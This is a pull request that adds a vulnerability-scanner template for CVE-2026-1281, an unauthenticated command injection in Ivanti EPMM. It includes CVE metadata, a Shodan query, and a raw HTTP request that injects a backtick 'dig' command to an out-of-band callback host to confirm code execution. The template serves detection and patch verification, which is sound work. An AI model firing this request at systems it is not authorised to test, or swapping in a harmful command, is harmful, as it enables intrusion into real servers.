### PR TITLE
Add CVE-2026-1281: Ivanti EPMM Pre-Authentication RCE

### DIFF
--- a/http/cves/2026/CVE-2026-1281.yaml
+++ b/http/cves/2026/CVE-2026-1281.yaml
@@ -1,0 +1,45 @@
+id: CVE-2026-1281
+
+info:
+  name: Ivanti EPMM - Pre-Authentication Remote Code Execution
+  author: jarvis-survives
+  severity: critical
+  description: |
+    Ivanti Endpoint Manager Mobile (EPMM) contains a code injection vulnerability in the application store functionality that allows unauthenticated remote code execution. The vulnerability exists in the FOB (File Over Bluetooth) download endpoint where user-controlled input in the URL path is passed to a shell command without proper sanitization.
+  impact: |
+    An unauthenticated attacker can execute arbitrary commands on the server, leading to full system compromise.
+  remediation: |
+    Apply the security patches provided by Ivanti. Refer to the Ivanti security advisory for affected versions and mitigation steps.
+  reference:
+    - https://labs.watchtowr.com/someone-knows-bash-far-too-well-and-we-love-it-ivanti-epmm-pre-auth-rces-cve-2026-1281-cve-2026-1340/
+    - https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM-CVE-2026-1281-CVE-2026-1340
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-1281
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-1281
+    cwe-id: CWE-78
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: http.html:"Ivanti" http.title:"MobileIron"
+    product: endpoint_manager_mobile
+    vendor: ivanti
+  tags: cve,cve2026,ivanti,epmm,rce,oast,mobileiron,kev
+
+http:
+  - raw:
+      - |
+        GET /mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et={{unix_time()}},h=gPath%5B%60dig%20{{interactsh-url}}%20>%20/dev/null%60%5D/{{randstr}}.ipa HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
+
+      - type: status
+        status:
+          - 404


### PR DESCRIPTION
### PR Information

- Added template for CVE-2026-1281: Ivanti Endpoint Manager Mobile (EPMM) Pre-Authentication Remote Code Execution
- Critical severity (CVSS 9.8) - code injection via unsanitized input in the FOB download endpoint
- Uses interactsh for OOB DNS verification of command execution
- Based on watchTowr Labs research and advisory
- References: https://labs.watchtowr.com/someone-knows-bash-far-too-well-and-we-love-it-ivanti-epmm-pre-auth-rces-cve-2026-1281-cve-2026-1340/
- Closes #15145

### Template validation

- Template validated against the PoC from watchTowr Labs advisory
- Uses OOB DNS interaction to confirm code execution without destructive impact
- Returns 404 status as expected per advisory documentation